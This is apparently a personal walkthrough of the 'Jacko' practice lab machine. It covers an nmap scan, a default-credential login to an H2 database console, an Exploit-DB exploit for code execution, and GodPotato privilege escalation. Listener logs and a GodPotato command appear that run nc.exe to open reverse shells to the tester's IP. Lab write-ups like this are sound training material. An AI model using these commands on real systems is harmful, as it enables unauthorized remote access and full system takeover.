Machine Information
- Machine Name: Jacko
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Nmap scan report for 192.168.140.66
Host is up, received user-set (0.018s latency).
Scanned at 2024-10-03 22:07:04 +08 for 616s
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
5040/tcp open unknown syn-ack ttl 125
8082/tcp open http syn-ack ttl 125 H2 database http console
9092/tcp open XmlIpcRegSvc? syn-ack ttl 125
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
There’s a port 8082 opened that is website. Lets just start with that port
Port 8082
Looking into the website, its a login page related to database.
Based on the nmap result, the version of this website is “H2 database http console”, make sure to check out existing exploit using this valuable information. After searching in google, I found https://www.exploit-db.com/exploits/45506 and https://www.exploit-db.com/exploits/49384 which both are vulnerable to specific version. Since I have no idea which exploit do I use, I tried to login using the default credentials which is autocomplete by default. It managed to login and I noticed that there’s a version number in it.
The version number is “H2 1.4.199” which means the exploit that will work is going to be https://www.exploit-db.com/exploits/49384. After reading the exploit, its basically writing a DLL file into the machine and try to execute command based on that.
After replicating the exploit, it works and I manage to execute command. So it’s time to get a reverse shell from here. I’ll upload nc.exe and get reverse shell by using my own nc.exe.
Although here it has some error, it will still work and saved into the path.
1
2
3
4
5
6
7
8
9
10
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.210] from (UNKNOWN) [192.168.188.66] 49877
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
I managed to get a shell but somehow the whoami command is missing. But based on the POC previously, the current user is not high privilege user and I’ll need to perform privilege escalation.
Privilege Escalation
Since the reverse shell that I do not have whoami command, I tried to check out in the website.
According to this result, the current user has SeImpersonatePrivilege privilege. Time to use some potato attacks. The exploit that I’ll be using is GodPotato. Just upload into the system and execute it to get high privilege user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
C:\Users\Public>.\god4.exe -cmd "C:\Users\Public\nc.exe 192.168.45.210 1235 -e cmd"
.\god4.exe -cmd "C:\Users\Public\nc.exe 192.168.45.210 1235 -e cmd"
[*] CombaseModule: 0x140731985952768
[*] DispatchTable: 0x140731988295264
[*] UseProtseqFunction: 0x140731987662864
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\6545f493-8d8a-4ded-bb1e-164a66f8149a\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00006c02-03e4-ffff-4f73-483404336800
[*] DCOM obj OXID: 0xd810e5ae3711fbbe
[*] DCOM obj OID: 0xa46e38127aeec715
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 788 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3136
1
2
3
4
5
6
7
8
rlwrap nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.210] from (UNKNOWN) [192.168.188.66] 49949
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
Although I still could not run whoami command, I could read everything in the Administrator folder which means I am now a high privilege user~
Things I learned from this machine
- Error does not always means code execution failure.
- get specific version number is crucial
- try harder ~